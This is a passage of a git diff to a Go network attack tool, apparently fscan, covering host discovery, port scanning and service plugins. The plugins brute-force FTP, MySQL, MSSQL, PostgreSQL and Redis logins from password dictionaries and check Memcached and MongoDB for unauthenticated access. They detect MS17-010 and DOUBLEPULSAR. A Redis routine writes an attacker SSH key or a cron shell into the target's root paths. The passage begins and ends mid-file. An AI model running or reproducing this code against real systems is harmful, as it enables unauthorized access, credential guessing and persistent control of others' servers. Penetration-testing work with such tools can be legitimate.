func (w *streamWriter) Close() error {
// send empty record to close the stream
return w.c.writeRecord(w.recType, w.reqId, nil)
}
func (this *FCGIClient) Request(env map[string]string, reqStr string) (retout []byte, reterr []byte, err error) {
var reqId uint16 = 1
defer this.rwc.Close()
err = this.writeBeginRequest(reqId, uint16(FCGI_RESPONDER), 0)
if err != nil {
return
}
err = this.writePairs(FCGI_PARAMS, reqId, env)
if err != nil {
return
}
if len(reqStr) > 0 {
err = this.writeRecord(FCGI_STDIN, reqId, []byte(reqStr))
if err != nil {
return
}
}
rec := &record{}
var err1 error
// recive untill EOF or FCGI_END_REQUEST
for {
err1 = rec.read(this.rwc)
if err1 != nil {
if err1 != io.EOF {
err = err1
}
break
}
switch {
case rec.h.Type == FCGI_STDOUT:
retout = append(retout, rec.content()...)
case rec.h.Type == FCGI_STDERR:
reterr = append(reterr, rec.content()...)
case rec.h.Type == FCGI_END_REQUEST:
fallthrough
default:
break
}
}
return
}

2
Plugins/findnet.go
View File

@@ -22,7 +22,7 @@ func Findnet(info *common.HostInfo) error {
}
func FindnetScan(info *common.HostInfo) error {
realhost := fmt.Sprintf("%s:%d", info.Host, 135)
realhost := fmt.Sprintf("%s:%v", info.Host, 135)
conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
if err != nil {
return err

25
Plugins/ftp.go
View File

@@ -9,6 +9,19 @@ import (
)
func FtpScan(info *common.HostInfo) (tmperr error) {
starttime := time.Now().Unix()
flag, err := FtpConn(info, "anonymous", "")
if flag == true && err == nil {
return err
} else {
errlog := fmt.Sprintf("[-] ftp://%v:%v %v %v", info.Host, info.Ports, "anonymous", err)
common.LogError(errlog)
tmperr = err
if common.CheckErrs(err) {
return err
}
}
for _, user := range common.Userdict["ftp"] {
for _, pass := range common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1)
@@ -16,9 +29,15 @@ func FtpScan(info *common.HostInfo) (tmperr error) {
if flag == true && err == nil {
return err
} else {
errlog := fmt.Sprintf("[-] ftp %v %v %v %v %v", info.Host, common.PORTList["ftp"], user, pass, err)
errlog := fmt.Sprintf("[-] ftp://%v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
common.LogError(errlog)
tmperr = err
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["ftp"])*len(common.Passwords)) * info.Timeout) {
return err
}
}
}
}
@@ -27,13 +46,13 @@ func FtpScan(info *common.HostInfo) (tmperr error) {
func FtpConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
Host, Port, Username, Password := info.Host, common.PORTList["ftp"], user, pass
Host, Port, Username, Password := info.Host, info.Ports, user, pass
conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v", Host, Port), time.Duration(info.Timeout)*time.Second)
if err == nil {
err = conn.Login(Username, Password)
if err == nil {
flag = true
result := fmt.Sprintf("FTP:%v:%v:%v %v", Host, Port, Username, Password)
result := fmt.Sprintf("[+] ftp://%v:%v:%v %v", Host, Port, Username, Password)
dirs, err := conn.List("")
//defer conn.Logout()
if err == nil {

289
Plugins/icmp.go
View File

@@ -3,62 +3,74 @@ package Plugins
import (
"bytes"
"fmt"
"github.com/shadow1ng/fscan/common"
"golang.org/x/net/icmp"
"log"
"net"
"os"
"os/exec"
"os/user"
"runtime"
"strings"
"sync"
"time"
)
var AliveHosts []string
var (
AliveHosts []string
OS = runtime.GOOS
ExistHosts = make(map[string]struct{})
livewg sync.WaitGroup
)
var SysInfo = GetSys()
func ICMPRun(hostslist []string, Ping bool) []string {
chanHosts := make(chan string, len(hostslist))
go func() {
for ip := range chanHosts {
if _, ok := ExistHosts[ip]; !ok && IsContain(hostslist, ip) {
ExistHosts[ip] = struct{}{}
if common.Silent == false {
if Ping == false {
fmt.Printf("(icmp) Target '%s' is alive\n", ip)
} else {
fmt.Printf("(ping) Target '%s' is alive\n", ip)
}
}
AliveHosts = append(AliveHosts, ip)
}
livewg.Done()
}
}()
type SystemInfo struct {
OS string
HostName string
Groupid string
Userid string
Username string
}
func GetSys() SystemInfo {
var sysinfo SystemInfo
sysinfo.OS = runtime.GOOS
name, err := os.Hostname()
if err == nil {
sysinfo.HostName = name
if Ping == true {
//使用ping探测
RunPing(hostslist, chanHosts)
} else {
name = "none"
//优先尝试监听本地icmp,批量探测
conn, err := icmp.ListenPacket("ip4:icmp", "0.0.0.0")
if err == nil {
RunIcmp1(hostslist, conn, chanHosts)
} else {
common.LogError(err)
//尝试无监听icmp探测
conn, err := net.DialTimeout("ip4:icmp", "127.0.0.1", 3*time.Second)
if err == nil {
go conn.Close()
RunIcmp2(hostslist, chanHosts)
} else {
common.LogError(err)
//使用ping探测
fmt.Println("The current user permissions unable to send icmp packets")
fmt.Println("start ping")
RunPing(hostslist, chanHosts)
}
}
}
u, err := user.Current()
if err == nil {
sysinfo.Groupid = u.Gid
sysinfo.Userid = u.Uid
sysinfo.Username = u.Username
} else {
sysinfo.Groupid = "1"
sysinfo.Userid = "1"
sysinfo.Username = name
}
return sysinfo
livewg.Wait()
close(chanHosts)
return AliveHosts
}
func IcmpCheck(hostslist []string) {
conn, err := icmp.ListenPacket("ip4:icmp", "0.0.0.0")
func RunIcmp1(hostslist []string, conn *icmp.PacketConn, chanHosts chan string) {
endflag := false
if err != nil {
log.Fatal(err)
}
var chanHosts = make(chan string)
go func() {
for {
if endflag == true {
@@ -67,46 +79,114 @@ func IcmpCheck(hostslist []string) {
msg := make([]byte, 100)
_, sourceIP, _ := conn.ReadFrom(msg)
if sourceIP != nil {
livewg.Add(1)
chanHosts <- sourceIP.String()
}
}
}()
go func() {
for ip := range chanHosts {
if !IsContain(AliveHosts, ip) {
fmt.Printf("(icmp) Target '%s' is alive\n", ip)
AliveHosts = append(AliveHosts, ip)
}
}
}()
for _, host := range hostslist {
write(host, conn)
dst, _ := net.ResolveIPAddr("ip", host)
IcmpByte := makemsg(host)
conn.WriteTo(IcmpByte, dst)
}
if len(hostslist) > 10 {
time.Sleep(6 * time.Second)
} else {
time.Sleep(3 * time.Second)
//根据hosts数量修改icmp监听时间
start := time.Now()
for {
if len(AliveHosts) == len(hostslist) {
break
}
since := time.Now().Sub(start)
var wait time.Duration
switch {
case len(hostslist) <= 256:
wait = time.Second * 3
default:
wait = time.Second * 6
}
if since > wait {
break
}
}
endflag = true
close(chanHosts)
conn.Close()
}
func write(ip string, conn *icmp.PacketConn) {
dst, _ := net.ResolveIPAddr("ip", ip)
IcmpByte := []byte{8, 0, 247, 255, 0, 0, 0, 0}
conn.WriteTo(IcmpByte, dst)
func RunIcmp2(hostslist []string, chanHosts chan string) {
num := 1000
if len(hostslist) < num {
num = len(hostslist)
}
var wg sync.WaitGroup
limiter := make(chan struct{}, num)
for _, host := range hostslist {
wg.Add(1)
limiter <- struct{}{}
go func(host string) {
if icmpalive(host) {
livewg.Add(1)
chanHosts <- host
}
<-limiter
wg.Done()
}(host)
}
wg.Wait()
close(limiter)
}
func icmpalive(host string) bool {
startTime := time.Now()
conn, err := net.DialTimeout("ip4:icmp", host, 6*time.Second)
if err != nil {
return false
}
defer conn.Close()
if err := conn.SetDeadline(startTime.Add(6 * time.Second)); err != nil {
return false
}
msg := makemsg(host)
if _, err := conn.Write(msg); err != nil {
return false
}
receive := make([]byte, 60)
if _, err := conn.Read(receive); err != nil {
return false
}
return true
}
func RunPing(hostslist []string, chanHosts chan string) {
var bsenv = ""
if OS != "windows" {
bsenv = "/bin/bash"
}
var wg sync.WaitGroup
limiter := make(chan struct{}, 50)
for _, host := range hostslist {
wg.Add(1)
limiter <- struct{}{}
go func(host string) {
if ExecCommandPing(host, bsenv) {
livewg.Add(1)
chanHosts <- host
}
<-limiter
wg.Done()
}(host)
}
wg.Wait()
}
func ExecCommandPing(ip string, bsenv string) bool {
var command *exec.Cmd
if SysInfo.OS == "windows" {
if OS == "windows" {
command = exec.Command("cmd", "/c", "ping -n 1 -w 1 "+ip+" && echo true || echo false") //ping -c 1 -i 0.5 -t 4 -W 2 -w 5 "+ip+" >/dev/null && echo true || echo false"
} else if SysInfo.OS == "linux" {
} else if OS == "linux" {
command = exec.Command(bsenv, "-c", "ping -c 1 -w 1 "+ip+" >/dev/null && echo true || echo false") //ping -c 1 -i 0.5 -t 4 -W 2 -w 5 "+ip+" >/dev/null && echo true || echo false"
} else if SysInfo.OS == "darwin" {
} else if OS == "darwin" {
command = exec.Command(bsenv, "-c", "ping -c 1 -W 1 "+ip+" >/dev/null && echo true || echo false") //ping -c 1 -i 0.5 -t 4 -W 2 -w 5 "+ip+" >/dev/null && echo true || echo false"
}
outinfo := bytes.Buffer{}
@@ -126,57 +206,42 @@ func ExecCommandPing(ip string, bsenv string) bool {
}
}
func PingCMDcheck(hostslist []string, bsenv string) {
var wg sync.WaitGroup
mutex := &sync.Mutex{}
limiter := make(chan struct{}, 50)
for _, host := range hostslist {
wg.Add(1)
limiter <- struct{}{}
go func(host string) {
defer wg.Done()
if ExecCommandPing(host, bsenv) {
mutex.Lock()
fmt.Printf("(Ping) Target '%s' is alive\n", host)
AliveHosts = append(AliveHosts, host)
mutex.Unlock()
}
<-limiter
}(host)
}
wg.Wait()
func makemsg(host string) []byte {
msg := make([]byte, 40)
id0, id1 := genIdentifier(host)
msg[0] = 8
msg[1] = 0
msg[2] = 0
msg[3] = 0
msg[4], msg[5] = id0, id1
msg[6], msg[7] = genSequence(1)
check := checkSum(msg[0:40])
msg[2] = byte(check >> 8)
msg[3] = byte(check & 255)
return msg
}
func ICMPRun(hostslist []string, Ping bool) []string {
if SysInfo.OS == "windows" {
if Ping == false {
IcmpCheck(hostslist)
} else {
PingCMDcheck(hostslist, "")
}
} else if SysInfo.OS == "linux" {
if SysInfo.Groupid == "0" || SysInfo.Userid == "0" || SysInfo.Username == "root" {
if Ping == false {
IcmpCheck(hostslist)
} else {
PingCMDcheck(hostslist, "/bin/bash")
}
} else {
fmt.Println("The current user permissions unable to send icmp packets")
fmt.Println("start ping")
PingCMDcheck(hostslist, "/bin/bash")
}
} else if SysInfo.OS == "darwin" {
if SysInfo.Groupid == "0" || SysInfo.Userid == "0" || SysInfo.Username == "root" {
if Ping == false {
IcmpCheck(hostslist)
} else {
PingCMDcheck(hostslist, "/bin/bash")
}
} else {
fmt.Println("The current user permissions unable to send icmp packets")
fmt.Println("start ping")
PingCMDcheck(hostslist, "/bin/bash")
}
func checkSum(msg []byte) uint16 {
sum := 0
length := len(msg)
for i := 0; i < length-1; i += 2 {
sum += int(msg[i])*256 + int(msg[i+1])
}
return AliveHosts
if length%2 == 1 {
sum += int(msg[length-1]) * 256
}
sum = (sum >> 16) + (sum & 0xffff)
sum = sum + (sum >> 16)
answer := uint16(^sum)
return answer
}
func genSequence(v int16) (byte, byte) {
ret1 := byte(v >> 8)
ret2 := byte(v & 255)
return ret1, ret2
}
func genIdentifier(host string) (byte, byte) {
return host[0], host[1]
}

29
Plugins/memcached.go
View File

@@ -8,21 +8,28 @@ import (
"time"
)
func MemcachedScan(info *common.HostInfo) (err error, result string) {
realhost := fmt.Sprintf("%s:%d", info.Host, common.PORTList["mem"])
func MemcachedScan(info *common.HostInfo) (err error) {
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
client, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
if err == nil {
client.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
client.Write([]byte("stats\n")) //Set the key randomly to prevent the key on the server from being overwritten
rev := make([]byte, 1024)
n, err := client.Read(rev)
err = client.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
if err == nil {
if strings.Contains(string(rev[:n]), "STAT") {
defer client.Close()
result = fmt.Sprintf("Memcached:%s unauthorized", realhost)
common.LogSuccess(result)
_, err = client.Write([]byte("stats\n")) //Set the key randomly to prevent the key on the server from being overwritten
if err == nil {
rev := make([]byte, 1024)
n, err := client.Read(rev)
if err == nil {
if strings.Contains(string(rev[:n]), "STAT") {
result := fmt.Sprintf("[+] Memcached %s unauthorized", realhost)
common.LogSuccess(result)
}
client.Close()
} else {
errlog := fmt.Sprintf("[-] Memcached %v:%v %v", info.Host, info.Ports, err)
common.LogError(errlog)
}
}
}
}
return err, result
return err
}

8
Plugins/mongodb.go
View File

@@ -11,6 +11,10 @@ import (
func MongodbScan(info *common.HostInfo) error {
_, err := MongodbUnauth(info)
if err != nil {
errlog := fmt.Sprintf("[-] Mongodb %v:%v %v", info.Host, info.Ports, err)
common.LogError(errlog)
}
return err
}
@@ -18,7 +22,7 @@ func MongodbUnauth(info *common.HostInfo) (flag bool, err error) {
flag = false
senddata := []byte{58, 0, 0, 0, 167, 65, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 255, 255, 255, 255, 19, 0, 0, 0, 16, 105, 115, 109, 97, 115, 116, 101, 114, 0, 1, 0, 0, 0, 0}
getlogdata := []byte{72, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 1, 0, 0, 0, 33, 0, 0, 0, 2, 103, 101, 116, 76, 111, 103, 0, 16, 0, 0, 0, 115, 116, 97, 114, 116, 117, 112, 87, 97, 114, 110, 105, 110, 103, 115, 0, 0}
realhost := fmt.Sprintf("%s:%d", info.Host, common.PORTList["mgo"])
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
if err != nil {
return flag, err
@@ -46,7 +50,7 @@ func MongodbUnauth(info *common.HostInfo) (flag bool, err error) {
text := string(buf[0:count])
if strings.Contains(text, "totalLinesWritten") {
flag = true
result := fmt.Sprintf("Mongodb:%v unauthorized", realhost)
result := fmt.Sprintf("[+] Mongodb:%v unauthorized", realhost)
common.LogSuccess(result)
}
}

11
Plugins/ms17017.go
View File

@@ -21,6 +21,10 @@ var (
func MS17010(info *common.HostInfo) error {
err := MS17010Scan(info)
if err != nil {
errlog := fmt.Sprintf("[-] Ms17010 %v %v", info.Host, err)
common.LogError(errlog)
}
return err
}
@@ -77,7 +81,7 @@ func MS17010Scan(info *common.HostInfo) error {
// find byte count
byteCount := binary.LittleEndian.Uint16(sessionSetupResponse[7:9])
if n != int(byteCount)+45 {
fmt.Println("invalid session setup AndX response")
fmt.Println("[-]", ip+":445", "ms17010 invalid session setup AndX response")
} else {
// two continous null bytes indicates end of a unicode string
for i := 10; i < len(sessionSetupResponse)-1; i++ {
@@ -137,13 +141,12 @@ func MS17010Scan(info *common.HostInfo) error {
}
if reply[34] == 0x51 {
//fmt.Printf("DOUBLEPULSAR SMB IMPLANT in %s\n", ip)
result := fmt.Sprintf("DOUBLEPULSAR SMB IMPLANT in %s", ip)
result := fmt.Sprintf("[+] %s has DOUBLEPULSAR SMB IMPLANT", ip)
common.LogSuccess(result)
}
} else {
result := fmt.Sprintf("%s (%s)", ip, os)
result := fmt.Sprintf("[*] %s (%s)", ip, os)
common.LogSuccess(result)
}
return err

13
Plugins/mssql.go
View File

@@ -10,6 +10,7 @@ import (
)
func MssqlScan(info *common.HostInfo) (tmperr error) {
starttime := time.Now().Unix()
for _, user := range common.Userdict["mssql"] {
for _, pass := range common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1)
@@ -17,9 +18,15 @@ func MssqlScan(info *common.HostInfo) (tmperr error) {
if flag == true && err == nil {
return err
} else {
errlog := fmt.Sprintf("[-] mssql %v %v %v %v %v", info.Host, common.PORTList["mssql"], user, pass, err)
errlog := fmt.Sprintf("[-] mssql %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
common.LogError(errlog)
tmperr = err
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["mssql"])*len(common.Passwords)) * info.Timeout) {
return err
}
}
}
}
@@ -28,8 +35,8 @@ func MssqlScan(info *common.HostInfo) (tmperr error) {
func MssqlConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
Host, Port, Username, Password := info.Host, common.PORTList["mssql"], user, pass
dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%d;encrypt=disable;timeout=%d", Host, Username, Password, Port, time.Duration(info.Timeout)*time.Second)
Host, Port, Username, Password := info.Host, info.Ports, user, pass
dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%v;encrypt=disable;timeout=%v", Host, Username, Password, Port, time.Duration(info.Timeout)*time.Second)
db, err := sql.Open("mssql", dataSourceName)
if err == nil {
db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)

13
Plugins/mysql.go
View File

@@ -10,6 +10,7 @@ import (
)
func MysqlScan(info *common.HostInfo) (tmperr error) {
starttime := time.Now().Unix()
for _, user := range common.Userdict["mysql"] {
for _, pass := range common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1)
@@ -17,9 +18,15 @@ func MysqlScan(info *common.HostInfo) (tmperr error) {
if flag == true && err == nil {
return err
} else {
errlog := fmt.Sprintf("[-] mysql %v %v %v %v %v", info.Host, common.PORTList["mysql"], user, pass, err)
errlog := fmt.Sprintf("[-] mysql %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
common.LogError(errlog)
tmperr = err
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["mysql"])*len(common.Passwords)) * info.Timeout) {
return err
}
}
}
}
@@ -28,8 +35,8 @@ func MysqlScan(info *common.HostInfo) (tmperr error) {
func MysqlConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
Host, Port, Username, Password := info.Host, common.PORTList["mysql"], user, pass
dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/%v?charset=utf8", Username, Password, Host, Port, "mysql")
Host, Port, Username, Password := info.Host, info.Ports, user, pass
dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?charset=utf8&timeout=%v", Username, Password, Host, Port, time.Duration(info.Timeout)*time.Second)
db, err := sql.Open("mysql", dataSourceName)
if err == nil {
db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)

144
Plugins/portscan.go
View File

@@ -9,93 +9,75 @@ import (
"time"
)
func ProbeHosts(host string, ports <-chan int, respondingHosts chan<- string, done chan<- bool, adjustedTimeout int64) {
for port := range ports {
con, err := net.DialTimeout("tcp4", fmt.Sprintf("%s:%d", host, port), time.Duration(adjustedTimeout)*time.Second)
if err == nil {
con.Close()
address := host + ":" + strconv.Itoa(port)
result := fmt.Sprintf("%s open", address)
common.LogSuccess(result)
respondingHosts <- address
}
}
done <- true
type Addr struct {
ip string
port int
}
func ScanAllports(address string, probePorts []int, threads int, adjustedTimeout int64) ([]string, error) {
ports := make(chan int, 20)
results := make(chan string)
done := make(chan bool, threads)
for worker := 0; worker < threads; worker++ {
go ProbeHosts(address, ports, results, done, adjustedTimeout)
}
for _, port := range probePorts {
ports <- port
}
close(ports)
var responses = []string{}
for {
select {
case found := <-results:
responses = append(responses, found)
case <-done:
threads--
if threads == 0 {
return responses, nil
}
}
}
}
func TCPportScan(hostslist []string, ports string, timeout int64) []string {
func PortScan(hostslist []string, ports string, timeout int64) []string {
var AliveAddress []string
probePorts := common.ParsePort(ports)
lm := 20
if len(hostslist) > 5 && len(hostslist) <= 50 {
lm = 40
} else if len(hostslist) > 50 && len(hostslist) <= 100 {
lm = 50
} else if len(hostslist) > 100 && len(hostslist) <= 150 {
lm = 60
} else if len(hostslist) > 150 && len(hostslist) <= 200 {
lm = 70
} else if len(hostslist) > 200 {
lm = 75
}
thread := 10
if len(probePorts) > 500 && len(probePorts) <= 4000 {
thread = len(probePorts) / 100
} else if len(probePorts) > 4000 && len(probePorts) <= 6000 {
thread = len(probePorts) / 200
} else if len(probePorts) > 6000 && len(probePorts) <= 10000 {
thread = len(probePorts) / 350
} else if len(probePorts) > 10000 && len(probePorts) < 50000 {
thread = len(probePorts) / 400
} else if len(probePorts) >= 50000 && len(probePorts) <= 65535 {
thread = len(probePorts) / 500
}
var wg sync.WaitGroup
mutex := &sync.Mutex{}
limiter := make(chan struct{}, lm)
for _, host := range hostslist {
wg.Add(1)
limiter <- struct{}{}
go func(host string) {
defer wg.Done()
if aliveAdd, err := ScanAllports(host, probePorts, thread, timeout); err == nil && len(aliveAdd) > 0 {
mutex.Lock()
AliveAddress = append(AliveAddress, aliveAdd...)
mutex.Unlock()
noPorts := common.ParsePort(common.NoPorts)
if len(noPorts) > 0 {
tmp := make(map[int]struct{})
var tmpPorts []int
for _, port := range probePorts {
for _, noport := range noPorts {
if port != noport {
if _, ok := tmp[port]; !ok {
tmp[port] = struct{}{}
tmpPorts = append(tmpPorts, port)
}
}
}
<-limiter
}(host)
}
probePorts = tmpPorts
}
workers := common.Threads
Addrs := make(chan Addr, len(hostslist)*len(probePorts))
results := make(chan string, len(hostslist)*len(probePorts))
var wg sync.WaitGroup
//接收结果
go func() {
for found := range results {
AliveAddress = append(AliveAddress, found)
wg.Done()
}
}()
//多线程扫描
for i := 0; i < workers; i++ {
go func() {
for addr := range Addrs {
PortConnect(addr, results, timeout, &wg)
wg.Done()
}
}()
}
//添加扫描目标
for _, port := range probePorts {
for _, host := range hostslist {
wg.Add(1)
Addrs <- Addr{host, port}
}
}
wg.Wait()
close(Addrs)
close(results)
return AliveAddress
}
func PortConnect(addr Addr, respondingHosts chan<- string, adjustedTimeout int64, wg *sync.WaitGroup) {
host, port := addr.ip, addr.port
con, err := net.DialTimeout("tcp4", fmt.Sprintf("%s:%v", host, port), time.Duration(adjustedTimeout)*time.Second)
if err == nil {
con.Close()
address := host + ":" + strconv.Itoa(port)
result := fmt.Sprintf("%s open", address)
common.LogSuccess(result)
respondingHosts <- address
wg.Add(1)
}
}

13
Plugins/postgres.go
View File

@@ -10,6 +10,7 @@ import (
)
func PostgresScan(info *common.HostInfo) (tmperr error) {
starttime := time.Now().Unix()
for _, user := range common.Userdict["postgresql"] {
for _, pass := range common.Passwords {
pass = strings.Replace(pass, "{user}", string(user), -1)
@@ -17,9 +18,15 @@ func PostgresScan(info *common.HostInfo) (tmperr error) {
if flag == true && err == nil {
return err
} else {
errlog := fmt.Sprintf("[-] psql %v %v %v %v %v", info.Host, common.PORTList["psql"], user, pass, err)
errlog := fmt.Sprintf("[-] psql %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
common.LogError(errlog)
tmperr = err
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["postgresql"])*len(common.Passwords)) * info.Timeout) {
return err
}
}
}
}
@@ -28,9 +35,9 @@ func PostgresScan(info *common.HostInfo) (tmperr error) {
func PostgresConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
Host, Port, Username, Password := info.Host, common.PORTList["psql"], user, pass
Host, Port, Username, Password := info.Host, info.Ports, user, pass
dataSourceName := fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", Username, Password, Host, Port, "postgres", "disable")
db, err := sql.Open("mysql", dataSourceName)
db, err := sql.Open("postgres", dataSourceName)
if err == nil {
db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
defer db.Close()

85
Plugins/redis.go
View File

@@ -11,6 +11,7 @@ import (
)
func RedisScan(info *common.HostInfo) (tmperr error) {
starttime := time.Now().Unix()
flag, err := RedisUnauth(info)
if flag == true && err == nil {
return err
@@ -21,9 +22,15 @@ func RedisScan(info *common.HostInfo) (tmperr error) {
if flag == true && err == nil {
return err
} else {
errlog := fmt.Sprintf("[-] redis %v %v %v %v %v", info.Host, common.PORTList["redis"], pass, err)
errlog := fmt.Sprintf("[-] redis %v:%v %v %v", info.Host, info.Ports, pass, err)
common.LogError(errlog)
tmperr = err
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Passwords)) * info.Timeout) {
return err
}
}
}
return tmperr
@@ -31,7 +38,7 @@ func RedisScan(info *common.HostInfo) (tmperr error) {
func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
flag = false
realhost := fmt.Sprintf("%s:%d", info.Host, common.PORTList["redis"])
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
if err != nil {
return flag, err
@@ -49,14 +56,14 @@ func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
result := fmt.Sprintf("[+] Redis:%s %s", realhost, pass)
common.LogSuccess(result)
flag = true
Expoilt(realhost, conn)
err = Expoilt(realhost, conn)
}
return flag, err
}
func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
flag = false
realhost := fmt.Sprintf("%s:%d", info.Host, common.PORTList["redis"])
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
if err != nil {
return flag, err
@@ -74,26 +81,31 @@ func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
result := fmt.Sprintf("[+] Redis:%s unauthorized", realhost)
common.LogSuccess(result)
flag = true
Expoilt(realhost, conn)
err = Expoilt(realhost, conn)
}
return flag, err
}
func Expoilt(realhost string, conn net.Conn) error {
dbfilename, dir, err := getconfig(conn)
if err != nil {
return err
}
flagSsh, flagCron, err := testwrite(conn)
if err != nil {
return err
}
if flagSsh == true {
result := fmt.Sprintf("Redis:%v like can write /root/.ssh/", realhost)
result := fmt.Sprintf("[+] Redis:%v like can write /root/.ssh/", realhost)
common.LogSuccess(result)
if common.RedisFile != "" {
writeok, text, err := writekey(conn, common.RedisFile)
if err != nil {
fmt.Println(fmt.Sprintf("[-] %v SSH write key errer: %v", realhost, text))
return err
}
if writeok {
result := fmt.Sprintf("%v SSH public key was written successfully", realhost)
result := fmt.Sprintf("[+] %v SSH public key was written successfully", realhost)
common.LogSuccess(result)
} else {
fmt.Println("Redis:", realhost, "SSHPUB write failed", text)
@@ -102,7 +114,7 @@ func Expoilt(realhost string, conn net.Conn) error {
}
if flagCron == true {
result := fmt.Sprintf("Redis:%v like can write /var/spool/cron/", realhost)
result := fmt.Sprintf("[+] Redis:%v like can write /var/spool/cron/", realhost)
common.LogSuccess(result)
if common.RedisShell != "" {
writeok, text, err := writecron(conn, common.RedisShell)
@@ -110,13 +122,14 @@ func Expoilt(realhost string, conn net.Conn) error {
return err
}
if writeok {
result := fmt.Sprintf("%v /var/spool/cron/root was written successfully", realhost)
result := fmt.Sprintf("[+] %v /var/spool/cron/root was written successfully", realhost)
common.LogSuccess(result)
} else {
fmt.Println("Redis:", realhost, "cron write failed", text)
fmt.Println("[-] Redis:", realhost, "cron write failed", text)
}
}
}
err = recoverdb(dbfilename, dir, conn)
return err
}
@@ -287,3 +300,55 @@ func testwrite(conn net.Conn) (flag bool, flagCron bool, err error) {
}
return flag, flagCron, err
}
func getconfig(conn net.Conn) (dbfilename string, dir string, err error) {
_, err = conn.Write([]byte(fmt.Sprintf("CONFIG GET dbfilename\r\n")))
if err != nil {
return
}
text, err := readreply(conn)
if err != nil {
return
}
text1 := strings.Split(text, "\n")
if len(text1) > 2 {
dbfilename = text1[len(text1)-2]
} else {
dbfilename = text1[0]
}
_, err = conn.Write([]byte(fmt.Sprintf("CONFIG GET dir\r\n")))
if err != nil {
return
}
text, err = readreply(conn)
if err != nil {
return
}
text1 = strings.Split(text, "\n")
if len(text1) > 2 {
dir = text1[len(text1)-2]
} else {
dir = text1[0]
}
return
}
func recoverdb(dbfilename string, dir string, conn net.Conn) (err error) {
_, err = conn.Write([]byte(fmt.Sprintf("CONFIG SET dbfilename %s\r\n", dbfilename)))
if err != nil {
return
}
dbfilename, err = readreply(conn)
if err != nil {
return
}
_, err = conn.Write([]byte(fmt.Sprintf("CONFIG SET dir %s\r\n", dir)))
if err != nil {
return
}
dir, err = readreply(conn)
if err != nil {
return
}
return
}

102
Plugins/scanner.go
View File

@@ -3,6 +3,7 @@ package Plugins
import (
"errors"
"fmt"
"github.com/shadow1ng/fscan/WebScan/lib"
"github.com/shadow1ng/fscan/common"
"reflect"
"strconv"
@@ -11,59 +12,82 @@ import (
)
func Scan(info common.HostInfo) {
fmt.Println("scan start")
fmt.Println("start infoscan")
Hosts, _ := common.ParseIP(info.Host, common.HostFile)
if common.IsPing == false {
Hosts = ICMPRun(Hosts, common.Ping)
fmt.Println("icmp alive hosts len is:", len(Hosts))
}
if info.Scantype == "icmp" {
return
}
AlivePorts := TCPportScan(Hosts, info.Ports, info.Timeout)
if info.Scantype == "portscan" {
return
}
var severports []string //severports := []string{"21","22","135"."445","1433","3306","5432","6379","9200","11211","27017"...}
for _, port := range common.PORTList {
severports = append(severports, strconv.Itoa(port))
}
lib.Inithttp(common.Pocinfo)
var ch = make(chan struct{}, common.Threads)
var wg = sync.WaitGroup{}
for _, targetIP := range AlivePorts {
info.Host, info.Ports = strings.Split(targetIP, ":")[0], strings.Split(targetIP, ":")[1]
if info.Scantype == "all" {
if info.Ports == "445" { //scan more vul
AddScan("1000001", info, ch, &wg)
AddScan("1000002", info, ch, &wg)
} else if IsContain(severports, info.Ports) {
AddScan(info.Ports, info, ch, &wg)
if len(Hosts) > 0 {
if common.IsPing == false {
Hosts = ICMPRun(Hosts, common.Ping)
fmt.Println("icmp alive hosts len is:", len(Hosts))
}
if info.Scantype == "icmp" {
return
}
AlivePorts := PortScan(Hosts, info.Ports, info.Timeout)
fmt.Println("alive ports len is:", len(AlivePorts))
if info.Scantype == "portscan" {
return
}
var severports []string //severports := []string{"21","22","135"."445","1433","3306","5432","6379","9200","11211","27017"...}
for _, port := range common.PORTList {
severports = append(severports, strconv.Itoa(port))
}
